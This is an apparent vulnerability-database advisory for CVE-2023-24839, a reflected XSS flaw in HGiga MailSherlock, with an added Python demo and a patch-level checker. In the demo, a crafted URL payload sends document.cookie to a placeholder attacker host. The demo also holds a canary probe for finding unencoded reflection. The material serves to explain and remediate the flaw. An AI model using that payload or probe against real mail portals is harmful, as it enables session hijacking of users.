VYPR
Unrated severity · NVD Advisory · Published Mar 27, 2023 · Updated Feb 19, 2025

HGiga MailSherlock - Reflected XSS

CVE-2023-24839

Description

HGiga MailSherlock’s specific function has insufficient filtering for user input. An unauthenticated remote attacker can exploit this vulnerability to inject JavaScript, conducting a reflected XSS attack.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

An unauthenticated reflected XSS vulnerability in HGiga MailSherlock v4.5 allows remote attackers to inject arbitrary JavaScript via a crafted URL.

Vulnerability

HGiga MailSherlock's specific function fails to properly filter special characters in URL parameters, allowing an attacker to inject arbitrary JavaScript. The vulnerability affects MailSherlock system version v4.5 with system packages iSherlock-user-4.5 versions up to and including 4.5-161 and iSherlock-antispam-4.5 versions up to and including 4.5-167 [1].

Exploitation

An unauthenticated remote attacker can craft a malicious URL containing JavaScript in a parameter. The attacker must trick a victim into clicking the link (user interaction). No authentication or special network position is required. When the victim accesses the URL, the injected script executes in the context of the victim's browser session [1].
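The flaw described under Vulnerability and the attack flow described above, reduced to code as an added example (this is not MailSherlock code; the endpoint path, the parameter name "q" and the page markup are assumptions). It shows a handler that echoes a query-string value into HTML without encoding, the same handler with context-aware output encoding, and a canary check a tester can use to tell full, partial and absent encoding apart:

```python
"""Reflected XSS of the kind described for CVE-2023-24839: a query-string
value is written into the HTML response without output encoding.
Added example, not MailSherlock code; the endpoint path, parameter name
and page markup are assumptions."""
import html
from typing import Optional
from urllib.parse import parse_qs, quote, urlparse

# Constructed attacker URL. The "q" parameter carries the payload that the
# vulnerable handler echoes back into the page.
PAYLOAD = "<script>new Image().src='https://attacker.test/c?'+document.cookie</script>"
CRAFTED_URL = "https://mail.example.test/cgi-bin/search?q=" + quote(PAYLOAD, safe="")


def reflected_param(url: str, name: str = "q") -> str:
    """Decode the reflected query parameter the way the server would see it."""
    return parse_qs(urlparse(url).query).get(name, [""])[0]


def render_vulnerable(value: str) -> str:
    """Insufficient filtering: the input is concatenated into HTML verbatim."""
    return f"<p>Results for: {value}</p>"


def render_hardened(value: str) -> str:
    """Fix: HTML-encode the value for the context it lands in. quote=True
    also encodes quotes, so the same helper is safe inside attributes."""
    return f"<p>Results for: {html.escape(value, quote=True)}</p>"


# Triage canary: a unique token followed by each HTML metacharacter, each
# tagged so that partial encoding (e.g. only "<" filtered) is visible.
CANARY_TOKEN = "xsscanary1"
CANARY_PIECES = [("<", "q1"), (">", "q2"), ('"', "q3"), ("'", "q4")]
CANARY = CANARY_TOKEN + "".join(c + tag for c, tag in CANARY_PIECES)


def surviving_metachars(response_body: str) -> Optional[str]:
    """Which canary metacharacters came back unencoded.

    None  -> the parameter is not reflected at all
    ""    -> reflected, but every metacharacter was encoded
    "<>"  -> reflected with "<" and ">" intact (exploitable)
    """
    if CANARY_TOKEN not in response_body:
        return None
    return "".join(c for c, tag in CANARY_PIECES if c + tag in response_body)


if __name__ == "__main__":
    value = reflected_param(CRAFTED_URL)
    print("vulnerable:", render_vulnerable(value))
    print("hardened:  ", render_hardened(value))
    print("canary vs vulnerable:", surviving_metachars(render_vulnerable(CANARY)))
    print("canary vs hardened:  ", repr(surviving_metachars(render_hardened(CANARY))))
```

The canary is more useful than sending a full script tag: a filter that strips only `<script>` still reflects `<q1>q2"q3'q4` intact, which tells you the sink is exploitable with a different tag or an attribute break-out, while an empty result means the encoding is doing its job in that context.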

Impact

Successful exploitation results in reflected cross-site scripting (XSS). The attacker's JavaScript runs in the victim's browser within the victim's session to the MailSherlock web interface, potentially leading to session hijacking, defacement, or redirection to malicious sites. The impact is confined to what that browser session is authorized to do (an administrator's session exposes administrative actions); the server itself is not directly compromised [1].

Mitigation

HGiga has released fixed versions: update iSherlock-user-4.5 to 4.5-162.386.rpm and iSherlock-antispam-4.5 to 4.5-168.386.rpm [1]. No workarounds are documented. The vulnerability is not listed in CISA's Known Exploited Vulnerabilities (KEV) catalog as of the publication date.
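A version check against the affected and fixed releases named above, as an added example (not HGiga tooling). It assumes package identifiers of the form "iSherlock-user-4.5-161", optionally followed by a ".386"-style build suffix as in the advisory's RPM file names, and that the number after the last "-" is the release the fix bumps; the package listing it runs over is constructed:

```python
"""Flag HGiga MailSherlock 4.5 system packages still below the releases the
advisory names as fixed for CVE-2023-24839. Added example, not HGiga
tooling. Assumptions: package identifiers look like
"iSherlock-user-4.5-161", optionally followed by a ".386"-style build
suffix as in the advisory's RPM file names, and the number after the
last "-" is the release that was bumped by the fix."""
import re
from typing import List, Optional, Tuple

# Releases named as fixed in the advisory: anything below these is affected.
FIXED_RELEASE = {
    "iSherlock-user-4.5": 162,
    "iSherlock-antispam-4.5": 168,
}

PKG_RE = re.compile(
    r"^(?P<name>iSherlock-(?:user|antispam)-4\.5)-(?P<release>\d+)(?:\.[\w.]+)?$"
)


def parse_package(identifier: str) -> Optional[Tuple[str, int]]:
    """Split "iSherlock-user-4.5-161.386" into ("iSherlock-user-4.5", 161)."""
    m = PKG_RE.match(identifier.strip())
    if not m:
        return None
    return m.group("name"), int(m.group("release"))


def vulnerable_packages(identifiers: List[str]) -> List[Tuple[str, int, int]]:
    """Return (name, installed_release, fixed_release) for each affected package."""
    findings = []
    for ident in identifiers:
        parsed = parse_package(ident)
        if parsed is None:
            continue  # unrelated package or unknown naming: skip, do not guess
        name, release = parsed
        fixed = FIXED_RELEASE[name]
        if release < fixed:
            findings.append((name, release, fixed))
    return findings


# Constructed sample: what a package listing from a partially patched host
# might look like, plus a noise line that must be ignored.
SAMPLE_LISTING = """
iSherlock-user-4.5-161.386
iSherlock-antispam-4.5-168.386
openssl-1.0.2k-26.el7_9
iSherlock-user-4.5-162.386
""".strip().splitlines()

if __name__ == "__main__":
    for name, have, need in vulnerable_packages(SAMPLE_LISTING):
        print(f"{name}: installed release {have}, fixed in {need}")
```

Unknown package names are skipped rather than reported, so a renamed or newer package line never produces a false "fixed" verdict by accident; confirm the naming on a real host before relying on the result.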

AI Insight generated on May 25, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 2

Patches: 0 (no patches discovered yet)

Vulnerability mechanics: AI mechanics synthesis has not run for this CVE yet.

References: 1

News mentions: 0 (no linked articles in our index yet)